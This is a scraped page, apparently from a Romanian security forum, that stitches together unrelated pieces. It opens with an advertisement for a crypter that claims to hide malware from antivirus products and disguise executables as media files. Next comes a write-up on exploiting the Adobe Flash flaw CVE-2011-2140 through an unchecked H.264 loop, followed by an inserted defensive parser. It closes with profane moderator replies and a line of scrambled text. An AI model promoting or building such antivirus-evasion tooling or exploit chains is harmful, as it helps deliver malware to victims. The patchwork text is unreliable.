- McAfee
- MS Security Essentials
- ESET NOD32
- Norman
- Norton Antivirus
- Panda Security
- A-Squared
- Quick Heal Antivirus
- Rising Antivirus
- Solo Antivirus
- Sophos
- Trend Micro Internet Security
- VBA32 Antivirus
- Vexira Antivirus
- Webroot Internet Security
- Zoner AntiVirus

we even tested 10 year old malware and our crypter can hide it from any anti-virus system. Our crypter comes with some unique features; here are some of them:
- FUD 0 / 35 detection
- EOF support
- Coded in C/ASM Stub and GUI in C#
- Compatible with Win 2k/XP/7 x32 and x64
- Ability to bypass heuristics and emulators (Kaspersky pro-active defense, Nod32 advanced heuristics, Norton Sonar, Avira heuristics)
- Command line support
- Unicode support (Chinese, Russian and so on)
- Right-to-Left Exploit: after crypting you can have .mp3, doc, pdf, avi or anything as output !!!
- inbuilt scanner and scanning with 35 anti-viruses after crypting
- advanced file binder with drop in disk and memory
- Anti-debug
- Anti-sandbox
- advanced encryption : Double XOR, RC4, AES256
- Advanced resource storage : unique method

here are some screenshots of the GUI :

and finally you can see the actual work in a demo here : http://abysssec.com/files/VampCrypt.rar

as we don't want to harm anyone, if you are :
- penetration testing company
- anti virus / IDS company
- any legit company who needs it

" please note that WE DON'T give tool / technology to PERSON . ONLY VERIFIED COMPANY "

contact : info [at] abysssec.com
and as always you can follow @abysssec on twitter

happy fudding .

Source: bypassing all anti-virus in the world (Good Bye Detection , Hello Infection) | Abysssec Security Research
-
[h=2]Exploiting CVE-2011-2140 another flash player vulnerability[/h]
Posted by shahin

hello all . before going further we are sorry for not updating the blog regularly, but it's because we are busy with a stack of projects and also working on our expert training courses. So as we didn't post any blog post, here we go with another flash player exploit we wrote a long time ago.

[h=1]1) Advisory information[/h]
Title : Adobe flash player memory overwrite exploit
Version : <= 10.3.186.3
Discovery : Zero Day Initiative
Vendor : http://adobe.com
Impact : Critical
Contact : info [at] abysssec.com
Twitter : @abysssec

[h=1]2) Vulnerability Information[/h]
Class : 1- Stack Overwrite
Impact : Successfully exploiting this issue allows remote attackers to gain code execution on the vulnerable system
Remotely Exploitable : Yes
Locally Exploitable : Yes

[h=1]3) Vulnerabilities detail[/h]
[h=2]1- Stack overwrite vulnerability[/h]
Before we go deep into the vulnerability: to understand this vulnerability you should take a look at the MP4 format and H.264/AVC data structures. The actual vulnerability occurs during processing of data units in the Sequence Parameter Set in MP4. The sub_1005B396 function is responsible for processing the Sequence Parameter Set. In this function pic_order_cnt_type from the SPS will be checked; if it's equal to 1, other fields like data_pic_order_always_zero_flag, offset_for_non_ref_pic, offset_for_top_to_bottom_field will be initialized :

.text:1005B396 sub_1005B396 proc near ; CODE XREF: sub_1005B8DB+4Bp
.text:1005B397 push ebp
.text:1005B398 push esi
.text:1005B399 push edi
.text:1005B39A mov edi, ecx
.text:1005B39C call sub_1005A95B
.text:1005B3A1 mov esi, [esp+10h+arg_0]
.text:1005B3A5 mov ecx, edi
.text:1005B3A7 mov [esi], al
…
.text:1005B47D mov ecx, edi
.text:1005B47F mov [esi+20h], eax
.text:1005B482 call sub_1005AA64
.text:1005B487 mov [esi+40h], eax
.text:1005B48A cmp eax, ebp → if( pic_order_cnt_type )
.text:1005B48C jnz short loc_1005B49D
…
.text:1005B49D loc_1005B49D: ; CODE XREF: sub_1005B396+F6j
.text:1005B49D xor ebx, ebx
.text:1005B49F inc ebx
.text:1005B4A0 cmp eax, ebx → if( pic_order_cnt_type == 1 )
.text:1005B4A2 jnz short loc_1005B4EF
.text:1005B4A4 mov ecx, edi
.text:1005B4A6 call sub_1005A99A → offset_for_top_to_bottom_field
.text:1005B4AB mov ecx, edi
.text:1005B4AD mov [esi+48h], al
.text:1005B4B0 call sub_1005AA93 → offset_for_non_ref_pic
.text:1005B4B5 mov ecx, edi
.text:1005B4B7 mov [esi+54h], eax
.text:1005B4BA call sub_1005AA93 → offset_for_top_to_bottom_field

Then num_ref_frames_in_pic_order_cnt_cycle will be set and if it's bigger than 0 the values in offset_for_ref_frame will be copied into the buffer.

.text:1005B4BF mov ecx, edi
.text:1005B4C1 mov [esi+50h], eax
.text:1005B4C4 call sub_1005AA64 → num_ref_frames_in_pic_order_cnt_cycle
.text:1005B4C9 mov [esi+4Ch], eax
.text:1005B4CC test eax, eax
.text:1005B4CE jbe short loc_1005B4EF
.text:1005B4D0 lea eax, [esi+58h]
.text:1005B4D3 mov [esp+10h+arg_0], eax
.text:1005B4D7
.text:1005B4D7 loc_1005B4D7: → do{
.text:1005B4D7 mov ecx, edi
.text:1005B4D9 call sub_1005AA93 → offset_for_ref_frame
.text:1005B4DE mov ecx, [esp+10h+arg_0]
.text:1005B4E2 add [esp+10h+arg_0], 4 → buf = &buf + 4
.text:1005B4E7 inc ebp → i++
.text:1005B4E8 mov [ecx], eax → buf = offset_for_ref_frame
.text:1005B4EA cmp ebp, [esi+4Ch]
.text:1005B4ED jb short loc_1005B4D7 → } while(i < num_ref_frames_…)

You should have got the vulnerability at this point. There is no boundary check for num_ref_frames_in_pic_order_cnt_cycle, so our data related to offset_for_ref_frame will be copied into the stack, that's all.

[h=2]2- Exploitation[/h]
Thanks to the windows memory manager, the browser and the class of bug, it's not that hard to achieve RCE. The only thing that you should care about is the return address, because the values which are copied from the MP4 file into the stack come with changes. In other words, these values, after being read from the file, will be decoded and then copied into the stack. The values copied into the buffer are generated from the values in the file as Signed Exp-Golomb code. After taking control of EIP it's easy to finish the job; we used a basic heap spray.

here is the reliable exploit : CVE-2011-2140

happy hunting !

Source: Exploiting CVE-2011-2140 another flash player vulnerability | Abysssec Security Research
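The post's bug is an unbounded loop over num_ref_frames_in_pic_order_cnt_cycle, read from the file as an Exp-Golomb code. The following is an added example, not Abysssec's code or exploit: an ue(v)/se(v) bit reader that parses the pic_order_cnt_type == 1 branch of an H.264 SPS the way the disassembly does, but with the boundary check the Flash code lacked. The bound of 255 is the limit the H.264 specification (7.4.2.1.1) places on that field; the bit writer exists only to construct sample input, including one that declares far more offsets than it carries, as a malformed file would.

```python
MAX_REF_FRAMES_CYCLE = 255  # H.264 7.4.2.1.1: num_ref_frames_in_pic_order_cnt_cycle in 0..255


class BitReader:
    """MSB-first bit reader with the Exp-Golomb decoders the SPS fields use."""
    def __init__(self, data):
        self.data, self.pos = data, 0

    def read_bit(self):
        if self.pos >= len(self.data) * 8:
            raise ValueError("bitstream truncated")
        bit = (self.data[self.pos >> 3] >> (7 - (self.pos & 7))) & 1
        self.pos += 1
        return bit

    def read_bits(self, n):
        value = 0
        for _ in range(n):
            value = (value << 1) | self.read_bit()
        return value

    def read_ue(self):
        """ue(v): count leading zeros, skip the 1, read that many more bits."""
        zeros = 0
        while self.read_bit() == 0:
            zeros += 1
            if zeros > 31:
                raise ValueError("ue(v) prefix too long")
        return (1 << zeros) - 1 + self.read_bits(zeros)

    def read_se(self):
        """se(v): codeNum k maps to +ceil(k/2) for odd k, -(k/2) for even k."""
        k = self.read_ue()
        return (k + 1) // 2 if k & 1 else -(k // 2)


def parse_pic_order_cnt(data):
    """Parse the pic_order_cnt section of an SPS; the type-1 branch mirrors the
    post's loop but refuses a count the fixed-size offset array cannot hold."""
    br = BitReader(data)
    sps = {"pic_order_cnt_type": br.read_ue()}
    if sps["pic_order_cnt_type"] == 0:
        sps["log2_max_pic_order_cnt_lsb_minus4"] = br.read_ue()
    elif sps["pic_order_cnt_type"] == 1:
        sps["delta_pic_order_always_zero_flag"] = br.read_bits(1)
        sps["offset_for_non_ref_pic"] = br.read_se()
        sps["offset_for_top_to_bottom_field"] = br.read_se()
        n = br.read_ue()
        if n > MAX_REF_FRAMES_CYCLE:  # the boundary check missing from the Flash code
            raise ValueError("num_ref_frames_in_pic_order_cnt_cycle=%d exceeds %d" % (n, MAX_REF_FRAMES_CYCLE))
        sps["num_ref_frames_in_pic_order_cnt_cycle"] = n
        sps["offset_for_ref_frame"] = [br.read_se() for _ in range(n)]
    return sps


def is_well_formed(data):
    try:
        parse_pic_order_cnt(data)
        return True
    except ValueError:
        return False


class BitWriter:
    """Encoder used only to construct sample input."""
    def __init__(self):
        self.bits = []

    def write_bits(self, value, n):
        self.bits.extend((value >> i) & 1 for i in range(n - 1, -1, -1))

    def write_ue(self, k):
        n = (k + 1).bit_length()
        self.write_bits(0, n - 1)
        self.write_bits(k + 1, n)

    def write_se(self, v):
        self.write_ue(2 * v - 1 if v > 0 else -2 * v)

    def tobytes(self):
        bits = self.bits + [0] * (-len(self.bits) % 8)
        return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8))


def encode_pic_order_cnt_type1(offsets, non_ref=-2, top_bottom=3, declared_count=None):
    """Constructed SPS fragment with pic_order_cnt_type=1. declared_count lets
    the sample claim more offsets than it carries, as a malformed file would."""
    w = BitWriter()
    w.write_ue(1)
    w.write_bits(0, 1)
    w.write_se(non_ref)
    w.write_se(top_bottom)
    w.write_ue(len(offsets) if declared_count is None else declared_count)
    for off in offsets:
        w.write_se(off)
    return w.tobytes()
```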
-
RudraScript .. Run code in every language from inside Lua scripts.
Nytro replied to co4ie's topic in Programare
Yes, interesting idea; a utility like this could be very useful.
-
We have a category called "Cos de gunoi" (the trash bin) where we move all the junk. You posted some two-bit links; I don't see what something like that is doing in Show-Off. Did you at least extract the database version? You open a link, put in a quote and you're 1337. Or put that link into Havij and you're 31337. I'm going to hand out bans for junk like this.
-
Alcohol seriously damages your health. Drop the bullshit and do something constructive.
-
Then we'd have to "discriminate". And for what, for some accounts? We'd have to consider who would have access to content posted by other people and why, and which people should have permission to post. And honestly, what the fuck do you do with those accounts? How many people WOULD POST accounts?
-
I only see a link, so nothing Show-Off worthy, so it gets moved to the trash.
-
Is this "Show Off"? Today's losers... "Show off" used to mean a Full Disclosure; now all I see is a shitty link you throw into Havij and that's it. Fuck the "young" generation!
-
It doesn't matter, it's fine for a start.
-
Very interesting. Ban. I'm fed up with shitty posts.
-
Maybe it's because I've been drinking, but I piss on both of you. Fuck off.
-
********* sends a new message for Romania
Nytro replied to unbeliever's topic in Cosul de gunoi
Fuck your anonymouses, you losers.
-
Kids with no future; they learned how to use Google and became hackers, pathetic.
-
I used to ban Tinkode here, Tinkode used to ban me on ISR. Those were the days.
-
From me for the boys: Florin Salam - Cap si pajura 2011 (Live Club One Million Timisoara) - YouTube
-
dsfMrdfUfxIcvE AdfNsdOdsfNtyYfgMzOxcUasSdf.
-
Don't come complaining to me that the wave of dumb kids has washed over you...
-
I paused Salam to listen to that crap? Fuck off!